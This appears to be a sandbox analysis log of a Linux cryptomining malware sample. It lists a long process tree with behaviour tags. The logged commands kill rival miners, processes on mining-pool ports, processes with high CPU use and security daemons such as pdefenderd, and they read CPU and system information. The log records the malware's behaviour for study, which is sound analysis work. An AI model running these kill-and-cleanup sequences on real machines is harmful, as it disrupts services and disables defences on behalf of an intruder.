/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1761

/bin/grep
grep :5555
2⤵
PID:1760

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1770

/bin/grep
grep -v -
2⤵
PID:1769

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1768

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1767

/bin/grep
grep :6666
2⤵
PID:1766

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1776

/bin/grep
grep -v -
2⤵
PID:1775

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1774

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1773

/bin/grep
grep :6665
2⤵
PID:1772

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1782

/bin/grep
grep -v -
2⤵
PID:1781

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1780

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1779

/bin/grep
grep :6667
2⤵
PID:1778

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1788

/bin/grep
grep -v -
2⤵
PID:1787

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1786

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1785

/bin/grep
grep :7777
2⤵
PID:1784

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1794

/bin/grep
grep -v -
2⤵
PID:1793

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1792

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1791

/bin/grep
grep :8444
2⤵
PID:1790

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1800

/bin/grep
grep -v -
2⤵
PID:1799

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1798

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1797

/bin/grep
grep :3347
2⤵
PID:1796

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1806

/bin/grep
grep -v -
2⤵
PID:1805

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1804

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1803

/bin/grep
grep :14444
2⤵
PID:1802

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1812

/bin/grep
grep -v -
2⤵
PID:1811

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1810

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1809

/bin/grep
grep :14433
2⤵
PID:1808

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1818

/bin/grep
grep -v -
2⤵
PID:1817

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1816

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1815

/bin/grep
grep :13531
2⤵
PID:1814

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1820

/bin/cat
cat /tmp/.X11-unix/01
2⤵
PID:1819

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1822

/bin/cat
cat /tmp/.X11-unix/11
2⤵
PID:1821

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1824

/bin/cat
cat /tmp/.X11-unix/22
2⤵
PID:1823

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1826

/bin/cat
cat /tmp/.pg_stat.0
2⤵
PID:1825

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1828

/bin/cat
cat /tmp/.pg_stat.1
2⤵
PID:1827

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1830

/bin/cat
cat /data/./oka.pid
2⤵
PID:1829

/usr/bin/pkill
pkill -f zsvc
2⤵
PID:1831

/usr/bin/pkill
pkill -f pdefenderd
2⤵
- Reads runtime system information
PID:1832

/usr/bin/pkill
pkill -f updatecheckerd
2⤵
PID:1833

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1838

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1837

/bin/grep
grep -v grep
2⤵
PID:1836

/bin/grep
grep ./oka
2⤵
PID:1835

/bin/ps
ps aux
2⤵
PID:1834

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1843

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1842

/bin/grep
grep -v grep
2⤵
PID:1841

/bin/grep
grep "postgres: autovacum"
2⤵
PID:1840

/bin/ps
ps aux
2⤵
PID:1839

/bin/grep
grep -v proxymap
2⤵
PID:1850

/bin/grep
grep -v postgres
2⤵
PID:1851

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1855

/bin/grep
grep -v postgrey
2⤵
PID:1852

/bin/grep
grep -v kinsing
2⤵
PID:1853

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1854

/bin/grep
grep -v php-fpm
2⤵
PID:1849

/bin/grep
grep -v "("
2⤵
PID:1848

/bin/grep
grep -v "\\["
2⤵
PID:1847

/bin/grep
grep -v bin
2⤵
PID:1846

/usr/bin/awk
awk "length(\$1) == 8"
2⤵
PID:1845

/bin/ps
ps ax -o "command,pid" -www
2⤵
PID:1844

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1866

/usr/local/sbin/kill
kill -9 1264
3⤵
PID:1867

/usr/local/bin/kill
kill -9 1264
3⤵
PID:1867

/usr/sbin/kill
kill -9 1264
3⤵
PID:1867

/usr/bin/kill
kill -9 1264
3⤵
PID:1867

/sbin/kill
kill -9 1264
3⤵
PID:1867

/bin/kill
kill -9 1264
3⤵
PID:1867

/bin/grep
grep -v postgres
2⤵
PID:1863

/bin/grep
grep -v postgrey
2⤵
PID:1864

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1865

/bin/grep
grep -v php-fpm
2⤵
PID:1861

/bin/grep
grep -v "("
2⤵
PID:1860

/bin/grep
grep -v proxymap
2⤵
PID:1862

/bin/grep
grep -v "\\["
2⤵
PID:1859

/bin/grep
grep -v bin
2⤵
PID:1858

/usr/bin/awk
awk "length(\$1) == 16"
2⤵
PID:1857

/bin/ps
ps ax -o "command,pid" -www
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1856

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1878

/usr/bin/awk
awk "{print \$1}"
2⤵
PID:1877

/bin/grep
grep -v postgrey
2⤵
PID:1876

/bin/grep
grep -v postgres
2⤵
PID:1875

/bin/grep
grep -v proxymap
2⤵
PID:1874

/bin/grep
grep -v php-fpm
2⤵
PID:1873

/bin/grep
grep -v "("
2⤵
PID:1872

/bin/grep
grep -v "\\["
2⤵
PID:1871

/bin/grep
grep -v bin
2⤵
PID:1870

/usr/bin/awk
awk "length(\$5) == 8"
2⤵
PID:1869

/bin/ps
ps ax
2⤵
PID:1868

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1883

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1882

/bin/grep
grep /tmp/sscks
2⤵
PID:1881

/bin/grep
grep -v grep
2⤵
PID:1880

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1879

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1888

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1887

/bin/grep
grep -v grep
2⤵
PID:1886

/bin/grep
grep "sleep 60"
2⤵
PID:1885

/bin/ps
ps aux
2⤵
PID:1884

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1893

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1892

/bin/grep
grep -v grep
2⤵
PID:1891

/bin/grep
grep ./crun
2⤵
PID:1890

/bin/ps
ps aux
2⤵
PID:1889

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1898

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:1897

/bin/grep
grep -v grep
2⤵
PID:1896

/bin/grep
grep -vw kdevtmpfsi
2⤵
PID:1895

/bin/ps
ps aux
2⤵
PID:1894

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1903

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1902

/bin/grep
grep :3333
2⤵
PID:1901

/bin/grep
grep -v grep
2⤵
PID:1900

/bin/ps
ps aux
2⤵
PID:1899

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1908

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1907

/bin/grep
grep :5555
2⤵
PID:1906

/bin/grep
grep -v grep
2⤵
PID:1905

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1904

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1913

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1912

/bin/grep
grep "kworker -c\\"
2⤵
PID:1911

/bin/grep
grep -v grep
2⤵
PID:1910

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1909

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1918

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1917

/bin/grep
grep log_
2⤵
PID:1916

/bin/grep
grep -v grep
2⤵
PID:1915

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1914

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1923

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1922

/bin/grep
grep systemten
2⤵
PID:1921

/bin/grep
grep -v grep
2⤵
PID:1920

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1919

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1928

/usr/local/sbin/kill
kill -9 14
3⤵
PID:1929

/usr/local/bin/kill
kill -9 14
3⤵
PID:1929

/usr/sbin/kill
kill -9 14
3⤵
PID:1929

/usr/bin/kill
kill -9 14
3⤵
PID:1929

/sbin/kill
kill -9 14
3⤵
PID:1929

/bin/kill
kill -9 14
3⤵
- Reads CPU attributes
PID:1929

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1927

/bin/grep
grep netns
2⤵
PID:1926

/bin/grep
grep -v grep
2⤵
PID:1925

/bin/ps
ps aux
2⤵
PID:1924

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1934

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1933

/bin/grep
grep voltuned
2⤵
PID:1932

/bin/grep
grep -v grep
2⤵
PID:1931

/bin/ps
ps aux
2⤵
PID:1930

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1939

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1938

/bin/grep
grep darwin
2⤵
PID:1937

/bin/grep
grep -v grep
2⤵
PID:1936

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1935

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1944

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1943

/bin/grep
grep /tmp/dl
2⤵
PID:1942

/bin/grep
grep -v grep
2⤵
PID:1941

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1940

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1949

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1948

/bin/grep
grep /tmp/ddg
2⤵
PID:1947

/bin/grep
grep -v grep
2⤵
PID:1946

/bin/ps
ps aux
2⤵
PID:1945

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1954

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1953

/bin/grep
grep /tmp/pprt
2⤵
PID:1952

/bin/grep
grep -v grep
2⤵
PID:1951

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1950

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1959

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1958

/bin/grep
grep /tmp/ppol
2⤵
PID:1957

/bin/grep
grep -v grep
2⤵
PID:1956

/bin/ps
ps aux
2⤵
PID:1955

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1964

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1963

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:1962

/bin/grep
grep -v grep
2⤵
PID:1961

/bin/ps
ps aux
2⤵
PID:1960

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1969

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1968

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:1967

/bin/grep
grep -v grep
2⤵
PID:1966

/bin/ps
ps aux
2⤵
PID:1965

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1974

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1973

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:1972

/bin/grep
grep -v grep
2⤵
PID:1971

/bin/ps
ps aux
2⤵
PID:1970

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1979

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1978

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:1977

/bin/grep
grep -v grep
2⤵
PID:1976

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1975

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1984

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1983

/bin/grep
grep 45.76.122.92
2⤵
PID:1982

/bin/grep
grep -v grep
2⤵
PID:1981

/bin/ps
ps aux
2⤵
PID:1980

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1989

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1988

/bin/grep
grep 51.38.191.178
2⤵
PID:1987

/bin/grep
grep -v grep
2⤵
PID:1986

/bin/ps
ps aux
2⤵
PID:1985

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1994

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1993

/bin/grep
grep 51.15.56.161
2⤵
PID:1992

/bin/grep
grep -v grep
2⤵
PID:1991

/bin/ps
ps aux
2⤵
PID:1990

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1999

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1998

/bin/grep
grep 86s.jpg
2⤵
PID:1997

/bin/grep
grep -v grep
2⤵
PID:1996

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1995

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2004

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2003

/bin/grep
grep aGTSGJJp
2⤵
PID:2002

/bin/grep
grep -v grep
2⤵
PID:2001

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2000

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2009

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2008

/bin/grep
grep nMrfmnRa
2⤵
PID:2007

/bin/grep
grep -v grep
2⤵
PID:2006

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2005

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2014

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2013

/bin/grep
grep PuNY5tm2
2⤵
PID:2012

/bin/grep
grep -v grep
2⤵
PID:2011

/bin/ps
ps aux
2⤵
PID:2010

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2019

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2018

/bin/grep
grep I0r8Jyyt
2⤵
PID:2017

/bin/grep
grep -v grep
2⤵
PID:2016

/bin/ps
ps aux
2⤵
PID:2015

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2024

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2023

/bin/grep
grep AgdgACUD
2⤵
PID:2022

/bin/grep
grep -v grep
2⤵
PID:2021

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2020

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2029

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2028

/bin/grep
grep uiZvwxG8
2⤵
PID:2027

/bin/grep
grep -v grep
2⤵
PID:2026

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2025

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2034

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2033

/bin/grep
grep hahwNEdB
2⤵
PID:2032

/bin/grep
grep -v grep
2⤵
PID:2031

/bin/ps
ps aux
2⤵
PID:2030

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2039

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2038

/bin/grep
grep BtwXn5qH
2⤵
PID:2037

/bin/grep
grep -v grep
2⤵
PID:2036

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2035

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2044

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2043

/bin/grep
grep 3XEzey2T
2⤵
PID:2042

/bin/grep
grep -v grep
2⤵
PID:2041

/bin/ps
ps aux
2⤵
PID:2040

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2049

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2048

/bin/grep
grep t2tKrCSZ
2⤵
PID:2047

/bin/grep
grep -v grep
2⤵
PID:2046

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2045

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2054

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2053

/bin/grep
grep HD7fcBgg
2⤵
PID:2052

/bin/grep
grep -v grep
2⤵
PID:2051

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2050

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2059

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2058

/bin/grep
grep zXcDajSs
2⤵
PID:2057

/bin/grep
grep -v grep
2⤵
PID:2056

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2055

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2064

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2063

/bin/grep
grep 3lmigMo
2⤵
PID:2062

/bin/grep
grep -v grep
2⤵
PID:2061

/bin/ps
ps aux
2⤵
PID:2060

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2069

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2068

/bin/grep
grep AkMK4A2
2⤵
PID:2067

/bin/grep
grep -v grep
2⤵
PID:2066

/bin/ps
ps aux
2⤵
PID:2065

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2074

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2073

/bin/grep
grep AJ2AkKe
2⤵
PID:2072

/bin/grep
grep -v grep
2⤵
PID:2071

/bin/ps
ps aux
2⤵
PID:2070

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2079

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2078

/bin/grep
grep HiPxCJRS
2⤵
PID:2077

/bin/grep
grep -v grep
2⤵
PID:2076

/bin/ps
ps aux
2⤵
PID:2075

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2084

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2083

/bin/grep
grep http_0xCC030
2⤵
PID:2082

/bin/grep
grep -v grep
2⤵
PID:2081

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2080

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2089

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2088

/bin/grep
grep http_0xCC031
2⤵
PID:2087

/bin/grep
grep -v grep
2⤵
PID:2086

/bin/ps
ps aux
2⤵
PID:2085

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2094

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2093

/bin/grep
grep http_0xCC032
2⤵
PID:2092

/bin/grep
grep -v grep
2⤵
PID:2091

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2090

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2099

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2098

/bin/grep
grep http_0xCC033
2⤵
PID:2097

/bin/grep
grep -v grep
2⤵
PID:2096

/bin/ps
ps aux
2⤵
PID:2095

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2104

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2103

/bin/grep
grep C4iLM4L
2⤵
PID:2102

/bin/grep
grep -v grep
2⤵
PID:2101

/bin/ps
ps aux
2⤵
PID:2100

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2109

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2108

/bin/grep
grep aziplcr72qjhzvin
2⤵
PID:2107

/bin/grep
grep -v grep
2⤵
PID:2106

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2105

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2113

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:2112

/bin/grep
grep -v grep
2⤵
PID:2111

/bin/ps
ps aux
2⤵
PID:2110

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2118

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2117

/bin/grep
grep /boot/vmlinuz
2⤵
PID:2116

/bin/grep
grep -v grep
2⤵
PID:2115

/bin/ps
ps aux
2⤵
PID:2114

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2123

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2122

/bin/grep
grep i4b503a52cc5
2⤵
PID:2121

/bin/grep
grep -v grep
2⤵
PID:2120

/bin/ps
ps aux
2⤵
PID:2119

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2128

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2127

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:2126

/bin/grep
grep -v grep
2⤵
PID:2125

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2124

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2133

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2132

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:2131

/bin/grep
grep -v grep
2⤵
PID:2130

/bin/ps
ps aux
2⤵
PID:2129

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2138

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2137

/bin/grep
grep nqscheduler
2⤵
PID:2136

/bin/grep
grep -v grep
2⤵
PID:2135

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2134

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2143

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2142

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:2141

/bin/grep
grep -v grep
2⤵
PID:2140

/bin/ps
ps aux
2⤵
PID:2139

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2149

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:2148

/bin/grep
grep "]"
2⤵
PID:2147

/bin/grep
grep -v aux
2⤵
PID:2146

/bin/grep
grep -v grep
2⤵
PID:2145

/bin/ps
ps aux
2⤵
PID:2144

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2154

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2153

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:2152

/bin/grep
grep -v grep
2⤵
PID:2151

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2150

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2159

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2158

/bin/grep
grep 0kwti6ut420t
2⤵
PID:2157

/bin/grep
grep -v grep
2⤵
PID:2156

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2155

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2164

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2163

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:2162

/bin/grep
grep -v grep
2⤵
PID:2161

/bin/ps
ps aux
2⤵
PID:2160

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2171

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:2170

/bin/grep
grep -v _
2⤵
PID:2169

/bin/grep
grep -v -
2⤵
PID:2168

/bin/grep
grep -v /
2⤵
PID:2167

/bin/grep
grep -v grep
2⤵
PID:2166

/bin/ps
ps aux
2⤵
PID:2165

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2176

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2175

/bin/grep
grep "\\[^"
2⤵
PID:2174

/bin/grep
grep -v grep
2⤵
PID:2173

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2172

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2181

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2180

/bin/grep
grep rsync
2⤵
PID:2179

/bin/grep
grep -v grep
2⤵
PID:2178

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2177

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2186

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2185

/bin/grep
grep watchd0g
2⤵
PID:2184

/bin/grep
grep -v grep
2⤵
PID:2183

/bin/ps
ps aux
2⤵
PID:2182

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2191

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2190

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2189

/bin/grep
grep -v grep
2⤵
PID:2188

/bin/ps
ps aux
2⤵
PID:2187

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2196

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2195

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:2194

/bin/grep
grep -v grep
2⤵
PID:2193

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2192

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2201

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2200

/bin/grep
grep /tmp/java
2⤵
PID:2199

/bin/grep
grep -v grep
2⤵
PID:2198

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2197

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2206

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2205

/bin/grep
grep gitee.com
2⤵
PID:2204

/bin/grep
grep -v grep
2⤵
PID:2203

/bin/ps
ps aux
2⤵
PID:2202

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2211

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2210

/bin/grep
grep /tmp/java
2⤵
PID:2209

/bin/grep
grep -v grep
2⤵
PID:2208

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2207

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2216

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2215

/bin/grep
grep 104.248.4.162
2⤵
PID:2214

/bin/grep
grep -v grep
2⤵
PID:2213

/bin/ps
ps aux
2⤵
PID:2212

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2221

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2220

/bin/grep
grep 89.35.39.78
2⤵
PID:2219

/bin/grep
grep -v grep
2⤵
PID:2218

/bin/ps
ps aux
2⤵
PID:2217

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2226

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2225

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:2224

/bin/grep
grep -v grep
2⤵
PID:2223

/bin/ps
ps aux
2⤵
PID:2222

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2231

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2230

/bin/grep
grep kthrotlds
2⤵
PID:2229

/bin/grep
grep -v grep
2⤵
